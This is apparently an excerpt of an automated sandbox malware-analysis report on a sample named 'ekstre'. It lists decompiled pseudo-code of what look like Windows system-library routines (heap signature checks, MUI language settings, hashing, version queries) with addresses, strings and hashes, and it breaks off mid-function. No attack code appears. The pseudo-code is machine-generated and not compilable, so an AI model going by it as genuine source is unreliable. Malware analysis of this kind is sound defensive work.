					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E341B5050(_t267,  &_v68, _t245);
							if(E341956E0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = L341BA8B0(_t284, ";");
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E341B5050(_t267,  &_v68, _t224);
						if(E341956E0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x34195117
0x3419511d
0x3419511f
0x34195121
0x34195124
0x34195127
0x3419512a
0x3419512d
0x34195130
0x34195133
0x34195136
0x3419513a
0x3419513c
0x34195141
0x341db9ab
0x341db9b0
0x34195460
0x34195463
0x34195469
0x3419546f
0x34195475
0x3419547b
0x34195481
0x34195484
0x3419548a
0x34195491
0x34195496
0x34195496
0x3419515e
0x341db9b7
0x341db9c1
0x341db9d0
0x341db9d0
0x341db9d5
0x341db9d5
0x3419517b
0x3419518a
0x34195190
0x34195195
0x34195195
0x341951af
0x3419526f
0x34195286
0x34195348
0x3419535f
0x34195446
0x34195446
0x34195449
0x34195449
0x3419544b
0x3419544f
0x341dbae9
0x341dbae9
0x34195455
0x3419545a
0x341dbaf5
0x341dbb08
0x341dbb0f
0x341dbb11
0x341dbb14
0x341dbb14
0x341dbaf5
0x00000000
0x3419545a
0x34195368
0x34195368
0x3419536b
0x34195370
0x341dbaa5
0x341dbaa7
0x34195376
0x34195387
0x34195389
0x3419538c
0x3419538c
0x34195391
0x341dbaaf
0x341dbab2
0x00000000
0x34195397
0x3419539c
0x341953a4
0x341953b2
0x341953b5
0x341953b8
0x341953fc
0x341953fc
0x34195404
0x3419540b
0x3419541f
0x34195421
0x34195421
0x3419541f
0x34195424
0x341dbabf
0x341dbacc
0x341dbad1
0x341dbad4
0x3419542a
0x3419542a
0x3419542a
0x3419542c
0x34195431
0x3419543e
0x3419543e
0x34195443
0x00000000
0x34195443
0x341953ba
0x341953bd
0x341953bf
0x341953c2
0x341953ca
0x341953de
0x341953e0
0x341953e0
0x341953e7
0x341953ee
0x341953f1
0x341953f2
0x341953f6
0x341953f9
0x00000000
0x341953f9
0x34195391
0x3419528f
0x3419528f
0x34195292
0x34195297
0x341dba41
0x341dba43
0x3419529d
0x341952ae
0x341952b0
0x341952b3
0x341952b3
0x341952b8
0x341dba4b
0x341dba4e
0x00000000
0x341952be
0x341952c3
0x341952c8
0x341952cb
0x341952ce
0x341952dd
0x341952e0
0x341952e3
0x341dba58
0x341dba5b
0x341dba5d
0x341dba60
0x341dba68
0x341dba7c
0x341dba7e
0x341dba7e
0x341dba85
0x341dba8c
0x341dba8f
0x341dba90
0x341dba94
0x341dba97
0x341dba97
0x341952e9
0x341952ec
0x341952f1
0x341952f8
0x3419530c
0x341dba9f
0x341dba9f
0x3419530c
0x34195314
0x34195323
0x34195328
0x3419532b
0x3419532b
0x3419532e
0x34195333
0x34195340
0x34195340
0x34195345
0x00000000
0x34195345
0x341952b8
0x341951b8
0x341951b8
0x341951bb
0x341951c0
0x341db9dd
0x341951c6
0x341951d2
0x341951d7
0x341951d9
0x341951dc
0x341951dc
0x341951e1
0x341db9e5
0x341db9e7
0x341db9ec
0x00000000
0x341951e7
0x341951ec
0x341951f1
0x341951f4
0x34195204
0x34195207
0x3419520a
0x341db9f4
0x341db9f7
0x341db9f9
0x341db9fc
0x341dba04
0x341dba18
0x341dba1a
0x341dba1a
0x341dba21
0x341dba28
0x341dba2b
0x341dba2c
0x341dba30
0x341dba33
0x341dba33
0x34195210
0x34195213
0x34195218
0x3419521f
0x34195233
0x341dba3b
0x341dba3b
0x34195233
0x3419523b
0x3419524a
0x3419524f
0x34195252
0x34195252
0x34195255
0x3419525a
0x34195267
0x34195267
0x3419526c
0x00000000
0x3419526c

Strings

WindowsExcludedProcs, xrefs: 3419514A
Kernel-MUI-Language-Allowed, xrefs: 3419519B
Kernel-MUI-Language-SKU, xrefs: 3419534B
Kernel-MUI-Number-Allowed, xrefs: 34195167
Kernel-MUI-Language-Disallowed, xrefs: 34195272

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 0f35456a4bf90c25f0a3cd1f4c810d90f174d7934e48f5e6896ef6763ae140bd
Instruction ID: 1641b90e5e5a9b1fdf13934fe80f80f4e90d5725a6307678afe0f77bc417ca61
Opcode Fuzzy Hash: 0f35456a4bf90c25f0a3cd1f4c810d90f174d7934e48f5e6896ef6763ae140bd
Instruction Fuzzy Hash: C4F14CB6D00A18EFDB55CF98C9C0ADEBBF9EF08650F51406AE505B7214EB709E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 3424ACEB Relevance: 6.4, APIs: 4, Instructions: 450
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E3424ACEB(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int* _v12;
				signed char _v13;
				signed char _v14;
				signed char _v16;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _t146;
				signed int _t149;
				signed int _t151;
				signed int _t167;
				signed int _t169;
				signed int _t173;
				signed char _t176;
				signed int _t195;
				void* _t211;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr* _t254;
				signed int _t261;
				signed char _t267;
				signed char _t274;
				intOrPtr _t283;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int* _t304;
				signed char _t305;
				void* _t333;
				unsigned int _t335;
				signed int _t336;
				signed char _t337;
				unsigned int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				intOrPtr _t349;
				signed char _t351;
				signed int _t353;
				signed char _t354;
				unsigned int _t355;
				unsigned int _t356;
				signed int _t358;
				unsigned int _t360;
				void* _t361;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed char* _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed char _t381;
				unsigned int _t383;

				_t146 = __edx;
				_v8 = __ecx;
				_v12 = __edx;
				_t251 = 0x4cb2f;
				_t3 = _t146 + 4; // 0x8b0775c0
				_t374 =  *_t3;
				_t360 =  *__edx << 2;
				if(_t360 < 8) {
					L3:
					_t361 = _t360 - 1;
					if(_t361 == 0) {
						L16:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						L17:
						_t375 = _v8;
						_t12 = _t375 + 0x1c; // 0x3424abd2
						_v24 = _t12;
						_t149 = L341753C0(_t12);
						_t362 = 0;
						while(1) {
							L18:
							_t14 = _t375 + 4; // 0x8bf8558b
							_t335 =  *_t14;
							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
							_t267 = _t251 & _t151;
							_v28 = _t151;
							_v20 = _t267;
							_v16 = _t267;
							if(_t362 != 0) {
								goto L21;
							}
							_t356 = _t335 >> 5;
							if(_t356 == 0) {
								_t362 = 0;
								L30:
								if(_t362 == 0) {
									L34:
									_t33 = _t375 + 0x1c; // 0x3424abd2
									E341752F0(_t267, _t33);
									_t35 = _t375 + 0x28; // 0x8b0a74f6
									_t36 = _t375 + 0x20; // 0x8bb372c7
									 *0x342691e0(0xc +  *_v12 * 4,  *_t35);
									_t337 =  *((intOrPtr*)( *_t36))();
									_v16 = _t337;
									if(_t337 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t337 + 0xb)) =  *_v12;
										 *(_t337 + 4) = _t251;
										_t46 = _t337 + 0xc; // 0xc
										_t167 = L34182330(L341B88C0(_t46, _v12[1],  *_v12 << 2), _v24);
										_t377 = _v8;
										_t364 = 0;
										do {
											_t49 = _t377 + 4; // 0x8bf8558b
											_t338 =  *_t49;
											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
											_v28 = _t169;
											_t274 = _t169 & _t251;
											_v20 = _t274;
											_v24 = _t274;
											if(_t364 != 0) {
												L40:
												_t339 = _v28;
												while(1) {
													_t364 =  *_t364;
													if((_t364 & 0x00000001) != 0) {
														break;
													}
													if(_t274 == ( *(_t364 + 4) & _t339)) {
														L45:
														if(_t364 == 0) {
															L52:
															_t253 = _t377;
															_t68 = _t253 + 0x28; // 0x8b0a74f6
															_t69 = _t253 + 4; // 0x8bf8558b
															_t378 =  *_t69;
															_t70 = _t253 + 0x20; // 0x8bb372c7
															_t365 =  *_t70;
															_v28 =  *_t68;
															_t72 = _t253 + 0x24; // 0x85f633fe
															_v40 =  *_t72;
															_t173 = _t378 >> 5;
															if( *_t253 < _t173 + _t173) {
																L73:
																_t380 = _v16;
																_t364 = _t380;
																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
																_v40 = _t176;
																_v28 = _t176;
																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
																_t136 = _t253 + 8; // 0xc183f44d
																_t283 =  *_t136;
																 *_t380 =  *(_t283 + _t343 * 4);
																 *(_t283 + _t343 * 4) = _t380;
																 *_t253 =  *_t253 + 1;
																_t381 = 0;
																L74:
																_t141 = _t253 + 0x1c; // 0x3424abd2
																E341824D0(_t141);
																if(_t381 != 0) {
																	_t142 = _t253 + 0x28; // 0x8b0a74f6
																	_t143 = _t253 + 0x24; // 0x85f633fe
																	 *0x342691e0(_t381,  *_t142);
																	 *((intOrPtr*)( *_t143))();
																}
																L76:
																return _t364;
															}
															_t285 = 2;
															_t173 = E341A4CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
															if(_t173 < 0) {
																goto L73;
															}
															_t383 = _v24;
															if(_t383 < 4) {
																_t383 = 4;
															}
															 *0x342691e0(_t383 << 2, _v28);
															_t173 =  *_t365();
															_t345 = _t173;
															_v12 = _t345;
															if(_t345 == 0) {
																_t144 = _t253 + 4; // 0x8bf8558b
																_t378 =  *_t144;
																if(_t378 >= 0x20) {
																	goto L73;
																}
																_t381 = _v16;
																_t364 = 0;
																goto L74;
															} else {
																_t83 = _t383 - 1; // 0x3
																_t288 = _t83;
																if((_t383 & _t288) == 0) {
																	L61:
																	if(_t383 > 0x4000000) {
																		_t383 = 0x4000000;
																	}
																	_t366 = _t345;
																	_v24 = _v24 & 0x00000000;
																	_t195 = _t253 | 0x00000001;
																	asm("sbb ecx, ecx");
																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
																	if(_t292 <= 0) {
																		L66:
																		_t92 = _t253 + 4; // 0x8bf8558b
																		_t367 = 0;
																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
																			L71:
																			_t121 = _t253 + 8; // 0xc183f44d
																			_t295 =  *_t121;
																			 *((intOrPtr*)(_t253 + 8)) = _v12;
																			_t124 = _t253 + 4; // 0x8bf8558b
																			_t173 =  *_t124 & 0x0000001f;
																			_t378 = _t383 << 0x00000005 | _t173;
																			 *(_t253 + 4) = _t378;
																			if(_t295 != 0) {
																				 *0x342691e0(_t295, _v28);
																				_t173 =  *_v40();
																				_t128 = _t253 + 4; // 0x8bf8558b
																				_t378 =  *_t128;
																			}
																			goto L73;
																		} else {
																			goto L67;
																		}
																		do {
																			L67:
																			_t97 = _t253 + 8; // 0xc183f44d
																			_t349 =  *_t97;
																			_v36 = _t349;
																			while(1) {
																				_t297 =  *(_t349 + _t367 * 4);
																				_v20 = _t297;
																				if((_t297 & 0x00000001) != 0) {
																					goto L70;
																				}
																				 *(_t349 + _t367 * 4) =  *_t297;
																				_t351 =  *(_t297 + 4) & _v32;
																				_t254 = _v20;
																				_v24 = _t351;
																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
																				_t304 = _v12;
																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
																				_t349 = _v36;
																			}
																			L70:
																			_t253 = _v8;
																			_t367 = _t367 + 1;
																			_t120 = _t253 + 4; // 0x8bf8558b
																		} while (_t367 <  *_t120 >> 5);
																		goto L71;
																	} else {
																		_t354 = _v24;
																		do {
																			_t354 = _t354 + 1;
																			 *_t366 = _t195;
																			_t366 = _t366 + 4;
																		} while (_t354 < _t292);
																		goto L66;
																	}
																}
																_t305 = _t288 | 0xffffffff;
																if(_t383 == 0) {
																	L60:
																	_t383 = 1 << _t305;
																	goto L61;
																} else {
																	goto L59;
																}
																do {
																	L59:
																	_t305 = _t305 + 1;
																	_t383 = _t383 >> 1;
																} while (_t383 != 0);
																goto L60;
															}
														}
														goto L46;
													}
												}
												_t364 = 0;
												goto L45;
											}
											_t355 = _t338 >> 5;
											if(_t355 == 0) {
												_t364 = 0;
												L49:
												if(_t364 == 0) {
													goto L52;
												}
												_t66 = _t364 + 8; // 0x8
												_t211 = E3424AC6F(_t66);
												_t253 = _t377;
												_t381 = _v16;
												if(_t211 == 0) {
													_t364 = 0;
												}
												goto L74;
											}
											_t56 = _t355 - 1; // 0x8bf8558a
											_t57 = _t377 + 8; // 0xc183f44d
											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
											_t274 = _v20;
											goto L40;
											L46:
											_t167 = E3424ACB2(_t364, _v12);
										} while (_t167 == 0);
										goto L49;
									}
									_t364 = 0;
									goto L76;
								}
								_t31 = _t362 + 8; // 0x8
								_t314 = _t31;
								if(E3424AC6F(_t31) == 0) {
									_t364 = 0;
								}
								E341752F0(_t314, _v24);
								goto L76;
							}
							_t21 = _t356 - 1; // 0x8bf8558a
							_t22 = _t375 + 8; // 0xc183f44d
							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
							_t267 = _v20;
							L21:
							_t336 = _v28;
							while(1) {
								_t362 =  *_t362;
								if((_t362 & 0x00000001) != 0) {
									break;
								}
								if(_t267 == ( *(_t362 + 4) & _t336)) {
									L26:
									if(_t362 == 0) {
										goto L34;
									}
									_t149 = E3424ACB2(_t362, _v12);
									if(_t149 != 0) {
										goto L30;
									}
									goto L18;
								}
							}
							_t362 = 0;
							goto L26;
						}
					}
					_t368 = _t361 - 1;
					if(_t368 == 0) {
						L15:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L16;
					}
					_t369 = _t368 - 1;
					if(_t369 == 0) {
						L14:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L15;
					}
					_t370 = _t369 - 1;
					if(_t370 == 0) {
						L13:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L14;
					}
					_t371 = _t370 - 1;
					if(_t371 == 0) {
						L12:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L13;
					}
					_t372 = _t371 - 1;
					if(_t372 == 0) {
						L11:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L12;
					}
					if(_t372 != 1) {
						goto L17;
					} else {
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L11;
					}
				} else {
					_t358 = _t360 >> 3;
					_t360 = _t360 + _t358 * 0xfffffff8;
					do {
						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
						_t250 = _t374[7] & 0x000000ff;
						_t374 =  &(_t374[8]);
						_t251 = _t261 + _t333 + _t250;
						_t358 = _t358 - 1;
					} while (_t358 != 0);
					goto L3;
				}
			}

0x3424acf4
0x3424acf6
0x3424acfb
0x3424acfe
0x3424ad05
0x3424ad05
0x3424ad08
0x3424ad0e
0x3424ad6f
0x3424ad6f
0x3424ad72
0x3424adc8
0x3424adce
0x3424add0
0x3424add0
0x3424add3
0x3424add7
0x3424adda
0x3424addf
0x3424ade1
0x3424ade1
0x3424ade1
0x3424ade1
0x3424adec
0x3424adf0
0x3424adf2
0x3424adf5
0x3424adf8
0x3424adfd
0x00000000
0x00000000
0x3424adff
0x3424ae04
0x3424ae69
0x3424ae6b
0x3424ae6d
0x3424ae8b
0x3424ae8b
0x3424ae8f
0x3424ae97
0x3424ae9a
0x3424aea9
0x3424aeb1
0x3424aeb3
0x3424aeb8
0x3424aec8
0x3424aec9
0x3424aeca
0x3424aed6
0x3424aedb
0x3424aede
0x3424aeea
0x3424aef9
0x3424aefe
0x3424af01
0x3424af03
0x3424af03
0x3424af03
0x3424af0e
0x3424af12
0x3424af15
0x3424af17
0x3424af1a
0x3424af1f
0x3424af5b
0x3424af5b
0x3424af5e
0x3424af5e
0x3424af66
0x00000000
0x00000000
0x3424af6f
0x3424af75
0x3424af77
0x3424afae
0x3424afae
0x3424afb0
0x3424afb3
0x3424afb3
0x3424afb6
0x3424afb6
0x3424afb9
0x3424afbc
0x3424afbf
0x3424afc4
0x3424afcc
0x3424b11b
0x3424b128
0x3424b12d
0x3424b12f
0x3424b132
0x3424b135
0x3424b15e
0x3424b160
0x3424b160
0x3424b166
0x3424b168
0x3424b16b
0x3424b16d
0x3424b16f
0x3424b16f
0x3424b173
0x3424b17a
0x3424b17c
0x3424b180
0x3424b185
0x3424b18b
0x3424b18b
0x3424b18d
0x3424b193
0x3424b193
0x3424afd4
0x3424afdc
0x3424afe3
0x00000000
0x00000000
0x3424afe9
0x3424afef
0x3424aff3
0x3424aff3
0x3424afff
0x3424b005
0x3424b007
0x3424b009
0x3424b00e
0x3424b194
0x3424b194
0x3424b19a
0x00000000
0x00000000
0x3424b1a0
0x3424b1a3
0x00000000
0x3424b014
0x3424b014
0x3424b014
0x3424b019
0x3424b02c
0x3424b033
0x3424b035
0x3424b035
0x3424b03a
0x3424b03c
0x3424b049
0x3424b052
0x3424b056
0x3424b058
0x3424b067
0x3424b067
0x3424b070
0x3424b07b
0x3424b07e
0x3424b0ec
0x3424b0ec
0x3424b0ec
0x3424b0f2
0x3424b0f5
0x3424b0fb
0x3424b0fe
0x3424b100
0x3424b105
0x3424b110
0x3424b116
0x3424b118
0x3424b118
0x3424b118
0x00000000
0x00000000
0x00000000
0x00000000
0x3424b080
0x3424b080
0x3424b080
0x3424b080
0x3424b083
0x3424b086
0x3424b086
0x3424b089
0x3424b092
0x00000000
0x00000000
0x3424b096
0x3424b09c
0x3424b0a7
0x3424b0b0
0x3424b0ca
0x3424b0cc
0x3424b0d2
0x3424b0d6
0x3424b0d9
0x3424b0d9
0x3424b0de
0x3424b0de
0x3424b0e1
0x3424b0e2
0x3424b0e8
0x00000000
0x3424b05a
0x3424b05a
0x3424b05d
0x3424b05d
0x3424b05e
0x3424b060
0x3424b063
0x00000000
0x3424b05d
0x3424b058
0x3424b01b
0x3424b020
0x3424b027
0x3424b02a
0x00000000
0x00000000
0x00000000
0x00000000
0x3424b022
0x3424b022
0x3424b022
0x3424b023
0x3424b023
0x00000000
0x3424b022
0x3424b00e
0x00000000
0x3424af77
0x3424af71
0x3424af73
0x00000000
0x3424af73
0x3424af21
0x3424af26
0x3424af8c
0x3424af8e
0x3424af90
0x00000000
0x00000000
0x3424af92
0x3424af95
0x3424af9a
0x3424af9c
0x3424afa1
0x3424afa7
0x3424afa7
0x00000000
0x3424afa1
0x3424af4d
0x3424af52
0x3424af55
0x3424af58
0x00000000
0x3424af79
0x3424af7d
0x3424af82
0x00000000
0x3424af8a
0x3424aeba
0x00000000
0x3424aeba
0x3424ae6f
0x3424ae6f
0x3424ae79
0x3424ae7b
0x3424ae7b
0x3424ae81
0x00000000
0x3424ae81
0x3424ae2b
0x3424ae30
0x3424ae33
0x3424ae36
0x3424ae39
0x3424ae39
0x3424ae3c
0x3424ae3c
0x3424ae44
0x00000000
0x00000000
0x3424ae4d
0x3424ae53
0x3424ae55
0x00000000
0x00000000
0x3424ae5b
0x3424ae62
0x00000000
0x00000000
0x00000000
0x3424ae64
0x3424ae4f
0x3424ae51
0x00000000
0x3424ae51
0x3424ade1
0x3424ad74
0x3424ad77
0x3424adbf
0x3424adc5
0x3424adc7
0x00000000
0x3424adc7
0x3424ad79
0x3424ad7c
0x3424adb6
0x3424adbc
0x3424adbe
0x00000000
0x3424adbe
0x3424ad7e
0x3424ad81
0x3424adad
0x3424adb3
0x3424adb5
0x00000000
0x3424adb5
0x3424ad83
0x3424ad86
0x3424ada4
0x3424adaa
0x3424adac
0x00000000
0x3424adac
0x3424ad88
0x3424ad8b
0x3424ad9b
0x3424ada1
0x3424ada3
0x00000000
0x3424ada3
0x3424ad90
0x00000000
0x3424ad92
0x3424ad98
0x3424ad9a
0x00000000
0x3424ad9a
0x3424ad10
0x3424ad12
0x3424ad18
0x3424ad1a
0x3424ad54
0x3424ad59
0x3424ad5f
0x3424ad63
0x3424ad68
0x3424ad6a
0x3424ad6a
0x00000000
0x3424ad1a

APIs

RtlDebugPrintTimes.NTDLL ref: 3424AEA9
RtlDebugPrintTimes.NTDLL ref: 3424B185

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: af2ee3dac80fbd9696a9321843fc572a193faeb083321c1a522b6d389c0446c9
Instruction ID: 7f388f247038ad1db35794187049aaf133ec7ec8e90ea9045e167361c8854a80
Opcode Fuzzy Hash: af2ee3dac80fbd9696a9321843fc572a193faeb083321c1a522b6d389c0446c9
Instruction Fuzzy Hash: 94F1D476F006129FDB0CCE68C99167EBBF6EF88200B5A416DD466EB384D674EA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 34167662 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E34167662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						L3416B910();
					} else {
						L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					L3416B910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						L3416B910(", passed to %s", _t29);
					}
					_push("\n");
					L3416B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x342647a1 = 1;
						asm("int3");
						 *0x342647a1 = 0;
					}
					return 0;
				}
				return 1;
			}

0x34167667
0x34167669
0x34167672
0x341cad93
0x341cadb2
0x341cadb7
0x341cad95
0x341cadaa
0x341cadaf
0x341cadc3
0x341cadcc
0x341cadd4
0x341cadda
0x341caddb
0x341cade0
0x341cadf0
0x341cadf2
0x341cadf9
0x341cadfa
0x341cadfa
0x00000000
0x341cae01
0x00000000

Strings

HEAP[%wZ]: , xrefs: 341CADA5
HEAP: , xrefs: 341CADB2
, passed to %s, xrefs: 341CADCF
RtlFreeHeap, xrefs: 341CADCE
Invalid heap signature for heap at %p, xrefs: 341CADBE

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 1114de19df68d7f495741ac94bba94b9614a97173016a92e846b44b7a21a9d5e
Instruction ID: 542696f794810d8a7a33aec80366e67fe6c1759afe320d401c17558ffee370f9
Opcode Fuzzy Hash: 1114de19df68d7f495741ac94bba94b9614a97173016a92e846b44b7a21a9d5e
Instruction Fuzzy Hash: B3012877105E50DFE3068B68E8C8F537BA5DB42675F1544CEE40247A92CA98D860D964

Uniqueness

Uniqueness Score: -1.00%

Function 34170485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E34170485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x34266630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E341782E0(0xabababab, 0, "kLsE", 0);
					 *0x34266630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E34195C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E34170670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E34170670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E34170630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E341B5050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E341B3EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
